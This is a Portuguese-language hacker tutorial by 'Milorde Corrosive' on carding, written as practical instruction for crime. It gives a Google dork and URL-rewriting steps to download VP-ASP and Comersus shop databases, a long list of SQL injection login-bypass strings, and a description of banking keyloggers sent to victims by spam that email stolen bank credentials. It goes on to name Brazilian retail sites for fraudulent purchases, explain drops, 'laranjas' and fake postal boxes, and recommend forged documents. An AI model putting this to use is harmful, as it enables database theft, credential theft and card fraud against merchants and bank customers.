Milorde no comando novamente uma hora dessas e eu to digitando acho que to ficando loko, minha mãe acha que eu to loko só porque eu amo meu computador.

Então Vamos iniciar mais um tutorialzinho ao jeito Milorde Corrosive

Vamos falar primeiro nas técnicas, porque será com elas que iremos obter dados e

info.

Engenharia Social (Seing)

Quem não conhece a famosa Engenharia Social ? Pessoal quem tem boca vai a Roma,

esqueceram? Jamais esqueçam isso se quiserem ser um Carder, Banker ou ate hacker mesmo.

Um pequeno resumo.

1. Chama-se Engenharia Social as práticas utilizadas para obter acesso à informações importantes

ou sigilosas em organizações ou sistemas por meio da enganação ou exploração da confiança das

pessoas. Para isso, o golpista pode se passar por outra pessoa, assumir outra personalidade, fingir

que é um profissional de determinada área, etc. É uma forma de entrar em organizações que não

necessita da força bruta ou de erros em máquinas. Explora as falhas de segurança das próprias

pessoas que, quando não treinados para esses ataques, podem ser facilmente manipuladas.

Uma técnica antiga que existe ainda, pois há muitos administradores burros. Vp-asp é uma técnica que explora a ma configuração do programa VP-ASP Shopping Cart, usado por várias empresas que Utilizam o sistema de comércio eletrônico. É explorada pelo browser, e basta você saber o nome do db e coloca-lo em seu browser, a partir daí faz o download do db. 1º passo: Vá até o google, ou use um programa de filtragem de url's e coloque para procurar pela seguinte palavra- Chave: "allinurl:shopdisplaycategories.asp" (sem as aspas) Vão aparecer url's mais ou menos assim: www.porcaria.Com/shop/shopdisplaycategories.asp 2º passo: Pegue o nome de uma das url's encontradas e coloque em seu browser, então substitua a parte "shopdisplaycategories.asp" por "shopdbtest.asp" para que a url fique assim: www.porcaria.com/shop/shopdbtest.asp A partir daí, vai aparecer uma tabela com vários nomes como: xDatabase = Nome do banco de dados. xDblocation = Localização do banco de dados. xdatabasetype = Tipo do banco de dados, se nada estiver escrito quer dizer que é do Access, ou seja, *.mdb xssl = Se estiver algo escrito, significa que o db(banco de dados) está nessa url. Mas e como faço para pegar o banco de dados? 3º passo: Veja o que está escrito em "xDatabase", este será o nome do db, normalmente é algo parecido com

"shopping.mdb" ou "shopping450.mdb". Agora você vê o que está escrito no "xDblocation", porque esse é o diretório onde está localizado o db, e agora? 4º passo: Coloque na url, o diretório que está o db, seguido do nome do db. Ficaria mais ou menos assim: www.porcaria.com/shop/fpdb/shopping.mdb < Endereço do banco de dados.

Caso contrario, vocês podem tentar um Sql Injection.

Esse Sql Injection que você iram tentar ser na mesma falha acima “vp-asp”

Vou dar uma pequena introdução aqui.

Uma das técnicas de fraude mais conhecida pelos desenvolvedores web é a SQL Injection. Trata se da

manipulação de uma instrução SQL através das variáveis quem compõem os parâmetros recebidos por

um script server

Side, tal como PHP, ASP, Cold Fusion e outros.

Nas mesmas urls que você fez a busca no tópico anterior sobre vp-asp, você vai encontrar na página um

link, na parte inferior, "Shop Administration" ou coisa parecida com Administrador.

Você tem que clicar no link e ele vai pedir o login e a senha. Você simplesmente vai responder os

campos assim:

shell

root

admin

hi ' ou 1=1 --

hi ' ou ' a'='a

hi ') ou (' a'='a

hi") ou ("a"="a

admin ' - -

' ou 0=0 --

"ou 0=0 --

ou 0=0 --

' or ' 1

b' or ' 1='

' or '1

' or '|

' or 'a'='a

' or ''='

' or 1=1--

') or ('a'='a

' or '1'='1

' ou 0=0 #

"ou 0=0 #

ou 0=0 #

' ou ' x'='x

"ou" x"="x

') ou (' x'='x

"ou" a"="a

') ou (' a'='a

") ou ("a"="a

hi "ou" a"="a

hi "ou 1=1 --

' ou 1=1 --

"ou 1=1 --

ou 1=1 --

' ou a=a --

' ou 1=1 --

"ou 1=1 --

ou 1=1 --

' ou a=a '

Há também outras técnicas antigas.

Webdav: A falha de WebDav, é uma falha antiga e atinge o IIS 5.0 e 4.0, no IIS 6.0

http://br.zone-h.org/content/view/476/11/

Tutorial sobre a técnica http://www.virtualpark.hpg.ig.com.br/hacker44.htm

Comersus: Vou passar pra vocês algumas string... Não vou ir muito alem.

/apps_shop.htm%20/comersus/database/comersus.mdb

/comersus/database/comersus.mdb

/database/comersus.mdb

/comersus_message.asp?

/store/database/comersus.mdb

/cg/.%20/comersus/database/comersus.mdb

/cgibin/database/comersus.mdb

/cg/comersus/database/comersus.mdb

/cgibin/cart/comersus.mdb

/cgibin/cart/database/comersus.mdb

/cg/./comersus/database/comersus.mdb

Agora vamos a técnica principal.

O famoso Keylogger Bankers

Como Funcionam?

O método de funcionamento de um keylogger é muito simples. Ao ser

executado por um usuário curioso, ele se instala no registro do computador (a

entrada do registro serve para dizer ao sistema operacional que o programa deve ser

iniciado após cada boot), e quando a pessoa abre uma das páginas dos bancos em

que esse keylogger foi programado para logar, ele grava todas as teclas

digitadas no site do banco incluindo o teclado virtual. Para o keylogger logar

um determinado banco ele tem que ter os dados desse banco armazenados

em sua database, sem esses dados o keylogger não logar o banco. E ao obter

esses dados, o keylogger age como emissor de e-mail e envia as suas senhas

em modo de texto limpo para o e-mail configurado pelo compilador do

keylogger. Lembrando que o keylogger dos bankers é um keylogger

inteligente, que não logar coisas aparentemente inúteis para eles como

senhas de e-mails, provedores etc. Ele só começa a logar quando a pessoa

entra no site do banco especificado em sua database de programação.

Obs: A maior parte dos bancos já se previne contra key/screenloggers, de várias

maneiras, como o tokens de papel ou não, por exemplo.

Vamos por a mão na massa.

Primeiramente você terá que ter o Keylogger, se não tiver você precisa de

contatos fortes para conseguir, ou ser um bom programador Delphi ou etc.

Com o Key na mão, envie pra suas vitimas... Forma de envio são:

Cliente de um Keylogger Banker

Então vocês já enviaram seus kl, por spam, msn, orkut, etc...

Agora é hora de receber os infects (logs carder).

Com infects na mão você poderá fazer suas compras, lógico você precisa de todos os

dados menos agencia.

Os bancos são:

BB Banco do Brasil

CEF Caixa Econômica Federal

Itau

Nc Nossa Caixa

Hsbc

Banespa

Entre outras dezenas de bancos que varia conforme cada Estado.

Pronto agora com todas as info na mão... O que você pode fazer?

Sim você pode fazer compras, irei dizer aqui algumas informações que você precisa saber

pois existe milhões de detalhes nessa área que é de um grande risco.

Prevenção de Cardear

Você tem que estar certo que o cartão é válido e com saldo!

Use de preferência cartão nacional, evite cartões estrangeiros.

Se você for cardear alguma coisa cara, use cartões American Express e Visa Gold, pois o limite e grande e não há perigo de não ter crédito:-)

Compre tudo à vista, em ultimo caso parcele.

Se você for cardear assinaturas de revistas (registramos casos desse tipo também), não assine revistas nacionais, cardeie as americanas, levam + ou - uns 20 dias para chegar. Uma dica Importante:

Se você puder alugue uma caixa postal nos correios, para receber essas revistas 6 meses = R$ 25,00

1 ano = R$ 50,00

2 anos = R$ 100,00

Jamais compre coisas de sua casa a não ser que você saiba o que esta fazendo com um bom proxy.

Onde fazer compras?

É pessoal como nada é fácil nessa vida de cão, não é em todos os sites que se

pode comprar, alguns utilizam um sistema mais seguro de confirmação de compra, outros não.

Aqui vou disponibilizar alguns sites.

Todo o site é vulnerável ao carding, mas alguns são mais difíceis.

www.americanas.com.br Eletro e eletrônico

www.comprafacil.com.br Eletro e eletrônico

www.vivo.com.br Celular

www.claro.com.br Celular

http://www.tim.com.br/ Celular

http://www.oglobo.globo.com/- Revistas

http://www.assineabril.com.br/- Editora Abril

http://www.editoraeuropa.com.br/- Pc Master

http://www.boticario.com.br/ perfumes

http://www.casadasaliancas.com.br/ bijoterias

http://www.cea.com.br/ Roupas

http://www.e-store.com.br/ Livraria www.meumicro.com.br computadores

www.motostore.com.br Tudo para Moto

www.natura.com.br <- Perfumes

www.samello.com.br Sapatos

www.siciliano.com.br Livros

www.sony.com.br Som digital e analogico

www.ultrafarma.com.br Drogaria

www.uniflores.com.br Flores

www.uol.com.br Provedor

www.casaevideo.com.br Locadora

Você já tem onde comprar não pode reclamar... Agora quem vai receber?

Para receber suas compras vou citar aqui quem pode receber pra você...

Caixa Postal: Isto que chamamos de caixa postal é nada mais nada menos do que uma conta que você abre no correio pagando uma taxa anual (± 100R$). Para faze-la você precisa da sua identidade, CPF e comprovante de endereço como conta de luz, água, etc. O mais indicado seria você fazer essa caixa postal com dados falsos, é difícil, mas nada é impossível. Para isso você deveria ter muito cuidado afinal teria que falsificar documentos e isso já é um crime, (ai já entra no meu tutorial de estelionatário http://www.corrosive.xpg.com.br/EstelionatarioMilorde.pdf) se a pessoa que estiver te atendendo perceber que é falso você não conseguirá concluir seu objetivo e talvez comece a ver o sol nascer quadrado. Informações sobre caixa postal: www.correios.com.br ou nas agencias filiadas.

Drop: O drop é o jeito que eu pessoalmente acho o melhor para receber e menos arriscado. Simplesmente é um pessoa ou lugar longe da sua casa ou em outro estado, país, o que você preferir que recebe suas compras e depois as manda para você. Se você depende de alguém que receba para você sempre mantenha essa pessoa satisfeita, compre coisas para ela (elas preferem) ou pague ela com dinheiro vivo mesmo.

Laranja: Laranja é alguém que se oferece para receber suas compras, essa pessoa usa sua própria casa ou usa lugares abandonados ou do jeito que ela preferir. Pode ser um amigo seu, um

vizinho, alguém pago para isso. Mas detalhe, essa pessoa tem que ser de

confiança, não deve ter conhecimentos sobre computador e ao menos

ter um.(recomendação apenas)

Mais um modo em que eu prefiro mais... É você colocar o numero de uma rua errado... E quando estiver perto da entrega você vai direto nos correios e recebe.

Obs: Nenhum, mas nenhum jeito é confiável. Sempre ha um jeito de se chegar até você. O que isto faz é dificultar este jeito. Também ha pessoas que recebem as compras na sua própria casa, mas não é aconselhável faze-lo.

Os cartões:

Existem vários tipos de cartões de crédito, mas somente quatro “marcas” conhecidas, Visa, Mastercard, American Express (AMEX) e Dinners.

Os preferidos dos carders são os AMEX, por causa de seu auto limite de gastos e sua alta aceitação, no mercado.

Cada tipo de cartão tem seus próprios métodos para o comércio on-line, mas não entrarei em detalhes sobre isso agora, talvez posteriormente.

Como identificar o tipo do cartão? Simples, quando o cartão começa com o número:

3 = AMEX 15 dígitos 4 = Visa 16 dígitos 5 = Mastercard Ele 16 dígitos 3 = Dinners 14 dígitos

É o tutorial já esta quase no fim, vou falar mais algumas coisinhas e to

me retirando...

Vamos ao medo... Pois quem tem Cu tem medo. Na hora da entrega não pode cagar. Vai ser simples, iram te dar um papel pra você assinar não precisa ficar com medo porque o papel não morde... E não fique nervoso, eles não iram te pedir documento a não ser que desconfiem muito de você, ai você tem que deixar algo preparado um documento falsificado e tals ( Estelionatário aqui http://www.corrosive.xpg.com.br/carder/EstelionatarioMilorde.pdf ).

Antes de ir embora venho aqui dar a dica... Proxy pessoal... Ninguém sabe o dia de amanha, e todos temos família, alguns tem filhos, e não queremos ninguém levando marmitex nas penitenciárias... Carder quando é descoberto é penalizado nas maiorias das vezes com multa e processos por Falsidade Ideológica, Estelionatário (dependendo do caso), Uso de informação Privada entre outras coisas que estão no código penal Brasileiro!

Pessoal use isso com responsabilidade... Não vá fazer merda, não quero

ver famílias em crise.

Por isso não me responsabilizo ( eu tenho medo )

kkkkkkkkkkkkkkkk

Nas entrelinhas

Corrosive...

Greatz: Emilio, LastK, Senset, w0x, Paranoick, Pedro, El Farra, Jiraya,

darvinxz e todo mundo que ta lendo essa merda

Kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk

Milorde fica por aqui

qualquer duvida www.google.com.br

Ou

Milordinho3@hotmail.com